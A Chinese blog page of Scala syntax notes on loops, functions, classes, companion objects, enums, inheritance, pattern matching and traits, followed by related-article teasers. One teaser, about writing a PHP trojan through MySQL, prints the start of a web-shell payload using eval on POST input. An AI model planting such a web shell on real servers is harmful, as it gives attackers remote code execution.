1:双重for循环(相当于j是i的内存循环):for (i <-0 to n; j <-10 to 20){ println(i);println(j)}

2:单层for循环:for (i <-0 to n) print(i)

3:单层for循环(不包含上限):for (i <-0 until n) print(i)

4:break需要借助breakable:

  

import scala.util.control.Break._
n=10
breakable { for (i <- 0 until n) {
if (i==5) break; //退出breakable块
print(i)
}
}

5:函数:(列表参数和普通参数)

def test(a:Int=123,b:String="zzq"):Int={//参数:参数类型=参数默认值):函数返回值

 if(a>123){
print("年龄:"+a)
}else{
print("年龄:"+a+" 姓名:"+b)
}
var sum=100;
sum //返回值
} //调用 test1(1 to 5:_*) 这样就形成了1~5的集合
def test1(c:Int*)={
var sum=0;
for(item <- c){
sum+=item
}
sum //返回值
}

6:类的定义

class Test1{//类定义
private var t1=0 def getT1=t1 def getT1_=(newV:Int){
t1=newV
}
} //主构造函数需要在类外部声明(如果构造函数传递的参数在内部其它方法中使用,则会变成private[this]这样的绝对私有变量)
class Test1(new1:Int=123,new2:String="abc"){ print(new1+" -- "+new2)}

7:伴生类和伴生对象在同一个文件中可以相互访问private field变量

object Test2{//一般用作静态方法访问的静态类,可理解为单例
private var _i=10
print("执行一次")
def getI=_i
def apply=new Test2("cba")//spark中大量使用伴生类重写apply方法来进行class对象的隐式创建方式
} class Test2(a:String="abc"){
print(a+" -- "+Test2._i)
} //执行结果 scala> Test2.getI
执行一次res10: Int = 10 scala> Test2.getI
res11: Int = 10 scala> var yy=new Test2("kkk")
kkk -- 10yy: Test2 = Test2@2fe88a09

8:枚举值

//scala中的枚举值

object Em extends Enumeration{
val or= Value(0,"or")
val and= Value(1,"and")
val where= Value(2,"where")
} //按索引标记取值:Em(0) //按枚举名称标记取值:Em.withName("where") //遍历:for(ele<- Em.values) print(ele)

9:继承:

class T1{

final def abc(){
println("这是abc")
} def abc1(){
println("这是abc1")
} final var abc2=123
val abc3=1234//只有这种val才能被覆盖 } class T2 extends T1{
override val abc3=990 override def abc1(){
println("这是重写的abc1 ")
}
}

10:类型判断

//模糊判断类型
scala> t2.isInstanceOf[T1]
res14: Boolean = true scala> t2.isInstanceOf[T2]
res15: Boolean = true //精确判断类型
scala> t2.getClass==classOf[T2]
res17: Boolean = true scala> t2.getClass==classOf[T1]
res18: Boolean = false

11:scala中的模式匹配

//传入的参数,但判断类型时实际使用的是isInstanceOf[xxx]
def getNum(item:Any)={
item match{
case x:String => print("String")
case i:Int => print("Int")
case c:Char => print("Char")
case _=>0//这个是完全没有匹配上的情况
}
}
def testMatch(i:Int,s:String="default"):Unit={
i match {
case 1 => print("数字:"+1)
case 2 => print("数字:"+2)
case 3 => print("数字:"+3)
case 5 if(s equals "mz") => print("数字:"+3+"mz")//匹配后仍可添加判断
case tmp1 => print("tmp1的赋值数字:"+tmp1)//会将i赋值给tmp1变量
case _ => print("其它喽")
}
}

12:triat可以多继承,其中可以有实现方法和未实现的抽象方法,但一般triat用于书写工具方法,在不同级别的实现类中去override,而且多重继承后会有责任链的特性

trait Log{
var t:Int
def wlog(name:String){}
} trait MyLog extends Log{
override var t=100//继承了Log的traint则必须要初始化
override def wlog(name:String){
print("MyLog ->"+name)
super.wlog(name)
}
} trait MyLog1 extends Log {
override def wlog(name:String){
print("MyLog1 ->"+name)
super.wlog(name)
}
} class P extends MyLog with MyLog1 {//调用链按照继承顺序,构造函数的调用也是按照继承顺序,以此类推(如果有同一父trait被多次继承则构造函数仅仅调用1次)
def get(){
wlog("开始调用 ")
}
}

scala语法的更多相关文章

  1. scala语法在spark withScope上的应用

    withSpout在spark中是用来做DAG可视化的,它在代码里的用法如下(以map为例,spark 2.0.0版本) def map[U: ClassTag](f: T => U): RDD ...

  2. scala语法解析(解码指环)

    看惯了JAVA的语法,再看scala的语法,有的晦涩难懂.正好遇到一个介绍scala语法的文章,就直接截图留念.省的再临时抱佛脚了.

  3. 1.scala语法

    对象的apply方法 (1)对象调用apply()方法,可省略成() (2)string对象的apply方法返回第n个字符 "hello"(4) //'o' if语句的返回值 ja ...

  4. Scala语法笔记

    JAVA中,举例你S是一个字符串,那么s(i)就是该字符串的第i个字符(s.charAt(i)).Scala中使用apply的方法 JAVA与C++的?:操作符 等同于Scala的 if ( x &g ...

  5. Java和Scala语法比较

    类型推断 挑逗指数: 四星 我们知道,Scala一向以强大的类型推断闻名于世.很多时候,我们无须关心Scala类型推断系统的存在,因为很多时候它推断的结果跟直觉是一致的. Java在2016 年也新增 ...

  6. Spark记录-Scala语法基础

    参考:http://docs.scala-lang.org/cheatsheets/index.html.http://docs.scala-lang.org/.http://www.scala-la ...

  7. Scala 语法基础

    一 简介 Scala 是一门多范式(multi-paradigm)的编程语言,设计初衷是要集成面向对象编程和函数式编程的各种特性.Scala 运行在Java虚拟机上,并兼容现有的Java程序.Scal ...

  8. Scala 语法(一)

    (1)基本语法 变量 val var(可变变量): 数据类型 Byte,Char,Int,Short,Long,String(字符),Float,Double,Boolean(true,flase). ...

  9. Scala语法(二)

    (1)类,对象 //定义类(属性.方法),实例化对象 class counter{ *//主构造器 class counter(name:String,mode:Int){ ... } 实例化:val ...

随机推荐

  1. [C#] 一款代码注释清理工具

    [C#] 一款代码注释清理工具   在程序开发过程中,很多时候我们都会在代码中进行注释,以便大家更容易理解或能更直观明白某个类或方法是用来做什么的,我们就会用注释 就以C#为列子,注释符大致为'//' ...

  2. Mybatis(二)基于注解的入门实例

    前言 上一篇简单的介绍了Mybatis的概念和基于XML来实现数据库的CRUD,这篇给大家实现基于注解的CRUD. 一.初始搭建 在基于注解当中前四步和上一篇基于XML是一样的,分别是: 1)创建数据 ...

  3. C# Winform 防止MDI子窗体重复打开

    可以在MDI主窗体中添加以下方法. //防止打开多个窗体 private bool ShowChildrenForm(string p_ChildrenFormText) { int i; //依次检 ...

  4. 通过mysql写入php一句话木马

    利用mysql写入一句话木马 前提: root权限,知道了服务器的web的绝对路径 select "<?php @eval($_POST['pass']);?>" IN ...

  5. 大杂烩 -- 四种生成和解析XML文档的方法详解

    基础大杂烩 -- 目录 众所周知,现在解析XML的方法越来越多,但主流的方法也就四种,即:DOM.SAX.JDOM和DOM4J DOM:在现在的Java JDK里都自带了,在xml-apis.jar包 ...

  6. [Android] 基于 Linux 命令行构建 Android 应用(四):命令行构建

    谷歌提供的 Android SDK 支持 Ant 自动构建[1],你可以使用调试和发行两种模式进行构建,两种模式不同之处在于调试模式 Ant 会调用内置的调试密钥,而发行模式调用你提供的私钥. 首先安 ...

  7. 三、K3 Cloud 开发插件《K3 Cloud插件开发新手指导 + K3 Cloud插件开发代码调试》

    案例需求:在销售订单上新增一个按钮,在订单明细中新增一个字段,命名[即时库存]. 点击按钮,弹出“Hello World!”,并获取订单明细物料的即时库存,填入字段[即时库存]. 开发工具:Visua ...

  8. 关于linux下mysql 5.7.x数据库的yum的安装方法

    环境介绍>>>>>>>>>>>>>>>>>> 操作系统:Centos 7.1 mysql数据 ...

  9. Power BI 报表服务器发布

    Power BI 报表服务器让你的用户能够访问数据.获取见解,并能够使用 SQL 报表服务器服务的企业报告功能 - 这一切都在现代本地解决方案中完成.让用户能够直观浏览数据并快速发现模式,以便更快作出 ...

  10. Dom捕捉事件和冒泡事件-原理与demo测试

    先参考一下百度百科对冒泡事件流的解释: ----------不喜欢读文字的同学,可以直接看下面demo,传递顺序简单明了! http://baike.baidu.com/link?url=kaeJHT ...